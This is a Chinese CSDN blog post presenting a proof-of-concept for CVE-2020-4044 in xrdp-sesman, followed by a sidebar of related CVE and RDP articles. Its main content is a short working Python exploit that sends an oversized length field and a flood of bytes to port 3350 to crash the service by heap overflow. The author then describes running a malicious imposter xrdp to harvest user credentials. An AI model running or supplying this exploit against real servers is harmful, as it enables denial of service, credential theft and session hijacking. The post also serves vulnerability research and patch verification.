CVE-2020-4044 poc

已于 2022-09-12 10:20:41 修改
阅读量215 收藏 1
点赞数 2
分类专栏: CVE 文章标签: linux
于 2022-09-12 10:20:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/azraelxuemo/article/details/126813907
版权

上次强网杯考了xrdp的题目,后来发现之前还有一个cve

CVE-2020-4044

The xrdp-sesman service before version 0.9.13.1 can be crashed by connecting over port 3350 and supplying a malicious payload. Once the xrdp-sesman process is dead, an unprivileged attacker on the server could then proceed to start their own imposter sesman service listening on port 3350. This will allow them to capture any user credentials that are submitted to XRDP and approve or reject arbitrary login credentials. For xorgxrdp sessions in particular, this allows an unauthorized user to hijack an existing session. This is a buffer overflow attack, so there may be a risk of arbitrary code execution as well.

这个exp其实比较好写,就是一个size任意赋值导致的堆溢出

#!/usr/bin/python3
import socket

def p32_big(content):
    return content.to_bytes(4,"big")


def connect():
    s = socket.socket()         
    host = "127.0.0.1" 
    port = 3350               
    s.connect((host, port))
    return s

fd=connect()
fd.sendall(p32_big(0)+p32_big(0xffffff8))
fd.sendall(b"a"*0xfffff)

在这里插入图片描述
在这里插入图片描述
这里官方对这个的定义其实就是一个劫持,我们把它打挂以后,跑一个恶意的xrdp收集凭证
因为这个版本的xrdp只支持一次一个连接,堆喷也比较麻烦,因为后面没啥结构体了

azraelxuemo
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-0796-PoC-master.zip
06-11
SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发缓冲区溢出,可能被攻击者利用远程执行任意代码。 SMBV3在通信过程中默认启动压缩/解压缩机制。如下图所示,攻击者在SMB压缩转换包的协议头中对OriginalSize值可控,这样OriginalSize以一个极大的值,写入固定的缓冲区中,造成缓冲区溢出。精心构造后可执行恶意命令。也就是压缩时所申请的内存大小小于解压后的大小,造成缓冲区溢出。
CentOS,XRDP发生身份验证错误,给函数提供的标志无效
无笺札记
10-16 7298
在 windows 系统里通过远程桌面(mstsc)远程访问 CentOS 系统的xrdp出现: 发生身份验证错误,给函数提供的标志无效 需要修改 /etc/xrdp/xrdp.ini ; set SSL protocols ; can be comma separated list of 'SSLv3', 'TLSv1', 'TLSv1.1', 'TLSv1.2', 'TLSv1.3' ssl...
Windows、Linux常见的渗透测试命令
weixin_46239998的博客
04-06 1230
渗透测试命令
死磕RDP协议,从截图和爆破说起
m0_46699477的博客
04-28 1152
Goby RDP 截图、暴力破解功能升级(兼容性强、检测能力提升、检测效率高) ​​​
Microsoft远程桌面协议RDP远程代码执行导致系统蓝屏漏洞编号CVE-2012-0002(MS12-020)
ranuy阮的博客
02-28 1万+
1、漏洞描述 在Windows XP 、Windows Server 2003 以及未开启网络层认证(Network Level Authentication)的Windows Server 2008 和Windows 7 中,只要操作系统开启Remote Desktop Protocol (RDP)服务,远程攻击者在未经认证的情况下往服务器发送畸形恶意的数据包,便可以以系统权限或者NET SER...
MS12-020 远程桌面漏洞允许远程执行代码 验证
mixboot
09-26 6761
MS12-020lou lou 参考: 远程桌面中的漏洞可能允许远程执行代码
Metasploit利用远程桌面协议RDP拒绝访问漏洞(MS12-020)
浮生若梦的专栏
06-22 1万+
漏洞版本: Microsoft Windows XP Professional Microsoft Windows XP Home Microsoft Windows Server 2003 Standard Edition Microsoft Windows Server 2003 Enterprise Edition Microsoft Windows Server 2003 Datac
远程桌面控制 原理_微软否认Windows远程桌面的网络身份验证漏洞:这是一项功能...
weixin_39614561的博客
11-23 290
安全研究人员称,Windows 1903 更新中存在的网络身份验证(NLA)bug,可被攻击者利用来控制远程会话。据悉,NLA 旨在防止攻击者远程登录到用户的 Windows PC 。它会要求登录者提供必要的详情,以便进行身份验证。原本攻击者不应该知晓这些细节,除非你与外界进行了分享。(截图 via MSPU)问题在于,在最新的 Windows10 1903(2019 五月更新)中,NLA 的工作...
Windows RDP协议重大漏洞后发现黑客开始大规模扫瞄
weixin_33701564的博客
05-28 721
微软在两周前公布Windows RDP协定重大漏洞后,安全专家发现(5月27日)已经有黑客开始大规模扫瞄网络上有漏洞的Windows系统,显示可能发动攻击。而多家安全厂商也制作出概念验证攻击程序。编号CVE-2019-0708的漏洞存在于旧版Windows远程桌面服务(Remote Desktop Service,RDS)中,本漏洞可使未授权攻击者得以利用RDP连上目标系统传送恶意呼叫。成功开采者...
RDP漏洞[+CVE-2019-0708+]无损扫描工具GUI.rar
05-21
最新CVE-2019-0708poc ,懂得来,不懂得就别来了,360火神团队写的poc,亲测好用,用于自建,无损检测
cve-2020-2551_poc.py
03-12
cve-2020-2551_poc.py
CVE-2020-1206-POC:CVE-2020-1206未初始化的内核内存读取POC
03-20
CVE-2020-1206未初始化的内核内存读取POC (c)2020 ZecOps,Inc.- ://www.zecops.com-查找攻击者的错误POC检查CVE-2020-1206 /“ SMBleed”预期结果:包含目标计算机内核内存的本地文件。仅用于公司环境中的教育和...
SAP_RECON:CVE-2020-6287,CVE-2020-6286的PoC(SAP RECON漏洞
04-01
CVE-2020-6287,CVE-2020-6286的PoC(SAP RECON漏洞) ff! RECON(NetWeaver上的可远程利用代码)? 伙计们,真的吗? 那是您想到的最好的代号? :) 此脚本可检查SAP LM配置向导是否缺少授权检查漏洞,并且PoC...
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
CTF特训日记day(4-6)
weixin_46483787的博客
12-06 958
分析到这里整体漏洞成因已经彻底清楚了,如果我们能控制一个不受任何限制的header_size,将其控制为0x80000000,即一个最小负数,从而绕过header_size不能大于总的输入长度的限制,然后read_so_far作为一个随意的小数,相减以后发生负溢出,header_size将变成一个非常巨大的远超8192的正数,从而导致堆溢出发生。即实际执行的是trans_tcp_recv,追溯到最后就是原生的recv函数,而其缓冲区则是self->in_s,通过init_stream函数分配空间。
漏洞利用实战(0) 搭建kali linux以及windows远程连接
weixin_44031198的博客
11-07 341
1 前言 想开个漏洞攻击的坑,不知道能不能填上。(记得之前有个从零入门的坑更到了零就不更了) 2 简介 漏洞利用(英语:Exploit,本意为“利用”)是计算机安全术语,指的是利用程序中的某些漏洞,来得到计算机的控制权(使自己编写的代码越过具有漏洞的程序的限制,从而获得运行权限)。在英语中,本词也是名词,表示为了利用漏洞而编写的攻击程序,即漏洞利用程序。(维基百科) ...
windows远程桌面连接到Linux服务器(ubuntu系统)、解决xrdp登录界面port问题、解决password failed
LxDamon的博客
12-09 1万+
 一: 一般在windows系统安装ssh客户端远程连接Linux服务器,可以很方便地传输文件。(注意:文件路径不能有小括号,空格之类的,不然会出现erro)。但如果想在Linux服务器使用图形化界面,ssh就办不到了。此时可以通过安装xrdp,就可以直接利用windows的远程桌面连接到Linux服务器。 方法: (1)安装新的桌面xubuntu-desktop: 由于ubuntu系统自带的...
XRDP远程连接错误总结
Francis Li
03-13 1万+
XRDP远程连接错误总结 XRDP无法连接,出错信息如下: 解决方案: sudo gedit /etc/xrdp/sesman.ini sudo gedit /etc/xrdp/sesman.ini 在末尾加上: param8=-SecurityTypes param9=None 然后重启xrdp服务: sudo service xrdp restart Reference: htt...
在一款D-Link消费级路由器上,我发现了10个严重漏洞
热门推荐
weixin_33989058的博客
09-15 1万+
本文讲的是在一款D-Link消费级路由器上,我发现了10个严重漏洞,近期,信息安全研究员皮埃尔·金(Pierre·Kim)公开了D-Link DIR 850L消费级无线路由器存在的10个严重漏洞。 此次公开的D-Link漏洞涉及多方面问题,如缺乏对固件映像的适当保护机制,意味着黑客可以向目标设备注入包含后门的恶意拷贝,以及D-Link私有的mydlin...
解读CVE-2020-1938 POC代码
最新发布
01-11
根据提供的引用内容,我无法直接解读CVE-2020-1938 POC代码,因为引用中的内容只是代码的一部分,并没有提供完整的代码。但是,我可以给你一些关于CVE-2020-1938的背景信息和一般的解读方法。 CVE-2020-1938是一个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值